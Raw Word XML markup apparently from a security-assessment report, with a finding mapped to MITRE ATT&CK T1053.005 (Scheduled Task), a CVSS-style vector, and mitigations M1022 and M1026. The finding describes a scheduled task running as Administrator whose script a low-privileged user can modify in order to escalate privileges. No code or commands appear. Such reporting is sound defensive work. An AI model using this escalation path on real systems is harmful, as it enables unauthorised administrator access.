                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:L</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A</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>T</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:N</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P</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>R</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:L</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U</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>I</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:N</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V</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>C</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H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>V</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>I</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H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VA</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H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SC</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:N</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SI</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>S</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>A</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1304DE43">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30709B" w14:textId="1E9465E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A9B5444" w:rsidP="0D325B6E" w:rsidRDefault="5A9B5444" w14:paraId="57562F09" w14:textId="45286132">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="5A9B5444">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6535381" w14:textId="02B040F9">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R1e6d7ee0366f4003">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15E19C70">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>053.005</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="64C488E4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve">: Scheduled Task/Job </w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3D75CC8A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>-</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="64C488E4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Scheduled Task</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1FFEDC15">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213C41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085A155" w:rsidP="0D325B6E" w:rsidRDefault="3085A155" w14:paraId="51321230" w14:textId="6C70D179">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="3085A155">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1A04A07" w:rsidP="0D325B6E" w:rsidRDefault="21A04A07" w14:paraId="10DD9C76" w14:textId="7AAC1C71">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rb056c9abd85c4d91">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="21A04A07">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1022: Restrict File and Directory Permissions</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="05D58348">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="32EFC248" w:rsidP="0D325B6E" w:rsidRDefault="32EFC248" w14:paraId="7F351103" w14:textId="4C3D9EB8">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19ed68aca225488e">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="32EFC248">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1026: Privileged Account Management</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="05D58348">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="5ABFCBF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520724" w14:textId="640BD38B">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50CF6D2" w14:textId="37F169C4">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1A159A1" w14:textId="7099E0DB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="13560F85" w:rsidP="0D325B6E" w:rsidRDefault="13560F85" w14:paraId="2F9AF636" w14:textId="75A295B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E1E1D44" w:rsidP="0D325B6E" w:rsidRDefault="0E1E1D44" w14:paraId="16EB7B78" w14:textId="2096880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1E1D44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The machine </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0E1E1D44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contains</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0E1E1D44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a scheduled task that runs a script controlled by </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0E1E1D44">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0E1E1D44">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This scheduled task runs as Administrator, </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5F670E35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">which can then be </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5F670E35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modified</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5F670E3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D232BFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">by a low privileged user </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5F670E35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to escalate to the Administrator account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3E47B4C5" w14:textId="0DD0989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3560F85" w:rsidP="0D325B6E" w:rsidRDefault="13560F85" w14:paraId="7EDD5A5D" w14:textId="7AD64B6C">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3560F8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2FFCE84" w:rsidP="0D325B6E" w:rsidRDefault="52FFCE84" w14:paraId="160D7A3B" w14:textId="0B2A93A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2FFCE84">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change the intended purpose of the scheduled </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="28AB11FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>task,</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52FFCE84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which will </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52FFCE84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>impact</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52FFCE84">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> business operations. The attacker can also use the scheduled task to gain Administrator access</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2E4EC7B2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and gain</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52FFCE8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DD96433">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
